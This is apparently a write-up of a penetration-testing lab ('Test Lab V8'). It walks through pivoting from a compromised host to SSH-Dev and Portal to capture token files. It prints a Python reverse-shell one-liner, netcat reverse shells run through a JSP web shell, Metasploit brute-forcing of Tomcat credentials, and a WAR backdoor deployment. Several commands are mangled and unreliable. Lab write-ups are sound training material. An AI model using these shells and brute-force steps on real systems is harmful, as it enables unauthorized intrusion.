Test Lab V8: SSH-Dev and Portal
This article is about Test Lab V8: SSH-Dev and Portal.
Information [Test Lab V8: SSH-Dev and Portal]:

Attack on SSH-Dev: As we can see in the diagram above, the IP of ssh-dev is 172.16.0.3, which cannot be pinged from the VPN network. So we will check the ping response from the Cabinet system, now we have already rooted the Cabinet system in our first part of the article where we uploaded the PHP shell to the system. Using the same backdoor, we used the ping command to check the SSH-Dev system.

SSH-Dev is therefore accessible from Cabinet. Let’s take a reverse shell from the Cabinet system to attack SSH-Dev, we introduced netcat by entering the following command nc-lvp 80

We used the following reverse Python shell to listen on port 80:
python -c “import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port)));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(‘/bin/bash’)” <10.10.X.X> 80

Now we have the Cabinet system’s shell access.

Now we will upload the Westfall’s ssh key from Cabinet’s file upload vulnerability.

Then, from Cabinet’s shell access, we navigated to the uploads folder where our Westfall SSH key was uploaded, and using the key, we connected to the SSH-Dev system via SSH using the following command ssh -i key.txt [email protected]

After that, we typed ls command for a directory listing, and we found the token file.

Portal Attack: Portal System IP is 192.168.0.3 which is also not accessible from VPN. To access the Portal system, we must first connect via CISCO VPN and then connect to the SSH Server. How do we access the SSH server? You will find this in our 3rd part of the article. We have connected to the SSH Serve and now we need to scan the IP Portal to create a python based port scanner to scan all port ranges.

We have uploaded the python code above to the public folder of the SSH server system. Using the command: sudo scp -i /root/Desktop/ /root/Desktop/ [email protected]:/public


We tried some default credentials for Apache Tomcat but nothing worked. We decided to use a brute force attack on the user’s credentials by using the Metasploit helper. We started Metasploit using the following command:
- use help/scanner/http/tomcat_mgr_login
- set RHOSTS localhost
- RPORT 9000 set
- set PASS_FILE /usr/share/wordlists/dirb/big.txt
- set USER_AS_PASS true
- set BLANK_PASSWORDS true
- set STOP_ON_SUCCESS true
- set of THREADS 20
- to use

At the end, we found the credentials which was tomcat : hydrogen

Now we need a reverse shell of this system for this we have to upload a JSP based backdoor. As can be seen below cmd.war file and it can be deployed as tomcat module.

Click on browse and select that cmd.war file and deploy it.

Now we can access the war deployed file via browser by typing http://127.0.0.1:9000/cmd/cmd.jsp

We started NetCat in our local system in listening mode by typing nc -lvp 443

After that we execute NetCat in our backdoor file by typing netcat -e /bin/sh <localsystemIP> 443

And we got the shell from Portal system

We did a search for token file by using the following command find -name “*token.”

And we found the token path in /webapps/ROOT/ directory, by using cat command we read the token file.

Related article:Everything you need to know about Ethical Hacking as a Career by Blackhat Pakistan 2023
Reference:
Port scanner in Python